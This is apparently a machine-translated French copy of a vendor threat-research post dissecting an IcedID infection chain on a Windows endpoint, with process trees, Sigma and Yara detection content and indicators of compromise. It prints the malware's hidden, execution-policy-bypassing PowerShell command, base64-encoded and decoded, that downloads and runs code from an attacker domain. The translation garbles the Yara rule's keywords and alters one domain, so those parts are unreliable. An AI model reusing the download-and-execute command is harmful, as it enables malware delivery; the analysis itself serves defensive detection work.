Fermer

avril 9, 2023

Disséquer le comportement d’IcedID sur un endpoint infecté

Disséquer le comportement d’IcedID sur un endpoint infecté


IcedID, également connu sous le nom de BokDot, est un cheval de Troie bancaire qui a été découvert pour la première fois en 2017. Il cible les informations financières d’une victime et est également capable de déposer d’autres logiciels malveillants, le plus souvent CobaltStrike.

OpenText ™ Cybersecurity Services a observé une récente campagne de spam où IcedID a été livré via un fichier zip archivé contenant un script Visual Basic.

L’équipe OpenText Services, dans le cadre de ses activités de recherche sur les menaces, surveille en permanence le comportement des logiciels malveillants sur le terminal et crée un contenu d’alerte pour le Service de détection et de réponse étendues gérées OpenText (MxDR) et ses clients des services de sécurité gérés.

Chaîne d’infection

Lors de l’exécution d’un JavaScript malveillant associé à l’infection IcedID, il appelle l’interpréteur de commandes pour exécuter un Windows PowerShell encodé en base64. Le PowerShell communique ensuite vers un domaine de redirection IcedID, suivi d’un téléchargement d’un malveillant DLL déposer. Ensuite, le PowerShell exécute la DLL téléchargée à l’aide du processus Rundll. Et enfin, la DLL lance un client Command and Control (C2) qui génère du trafic avec le serveur IcedID C2.

Processus WScript interagissant avec un JavaScript dans le dossier de téléchargement des utilisateurs
Règle Sigma – Commande et script Visual Basic

Processus parent : C:\Windows\explorer.exe
Processus enfant : C:\Windows\System32\wscript.exe
Ligne de commande: C:\Windows\System32\WScript.exe:C:\Users\Administrator\Downloads\scan_contract.js

Processus WScript interagissant avec le processus Cmd pour exécuter PowerShell

Processus parent : C:\Windows\System32\wscript.exe
Processus enfant : C:\Windows\System32\cmd.exe
Ligne de commande: “C:\Windows\System32\cmd.exe” /c poWershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkAYwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA

Interpréteur de commandes interagissant avec PowerShell pour exécuter un script encodé en Base64

Script Base64 décodé :
IEX (New-Object Net.Webclient).downloadstring(« http://shisyatnic[.]haut/gatef1.php »)

Processus parent : C:\Windows\System32\cmd.exe
Processus enfant : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Ligne de commande: poWershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkAYwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA

Règle Sigma – PowerShell codé utilisé pour télécharger et exécuter des DLL malveillantes
PowerShell créant une connexion réseau sortante pour télécharger la DLL IcedID
IcedID redirige vers un emplacement de téléchargement de DLL malveillant
Téléchargement du téléchargement malveillant d’IcedID
PowerShell exécutant le fichier DLL téléchargé
PowerShell exécutant la DLL à partir du répertoire Local Temp
Rundll créant une connexion réseau sortante à IcedID C2
L’agent OpenText MDR analyse et alerte de manière cohérente vers une mémoire hôte pour le
exécution sur des DLL non signées ou non approuvées
Analyse des chaînes de la DLL déchargée de la mémoire identifiant les chaînes couramment utilisées dans les DLL malveillantes IcedID (liste partielle affichée)

Règle Yara pour l’identification IcedID :

règle IcedID_Malware {
méta :
auteur = « OpenText »
description = « Détecte IcedID »
chaînes :
$s1 = « POST » mot complet large
$s2 =  » ; _ga= » mot complet large
$s3 =  » ; _u= » mot complet large
$s4 =  » ; __io= » mot complet large
$s5 =  » ; _gid= » mot complet large
$s6 = « Cookie : _s= » mot entier large
condition:
tout ($s*)
}

Indicateurs de compromis :
Domaine de redirection IcedID : chisyatnik[.]haut/gatef1.php
Domaine d’hébergement DLL IcedID : shisyatnic[.]top/dll/loader_p1_dll_64_n1_x64_inf.dll77.dll
IcedID C2 : skanfordiporka[.]com
IcedID JavaScript : hachage MD5 – fb1a30af0da989004eaeeac8e72778df
DLL IcedID : hachage MD5 – 658f14c5d83de5e5fee5f5ae00087139

Services de cybersécurité OpenText

Lors de la détection d’un logiciel malveillant, comme IceID, OpenText recommande qu’une réponse aux incidents soit effectuée. Notre équipe de consultants utilise sa vaste expérience pour chasser les menaces et remédier à toute cyberattaque suspectée. Les clients comptent sur OpenText pour leur criminalistique numérique et leur réponse aux incidents, ainsi que pour nos services de conseil en matière de risques et de conformité et de sécurité gérée. En savoir plus sur nos Services.




Source link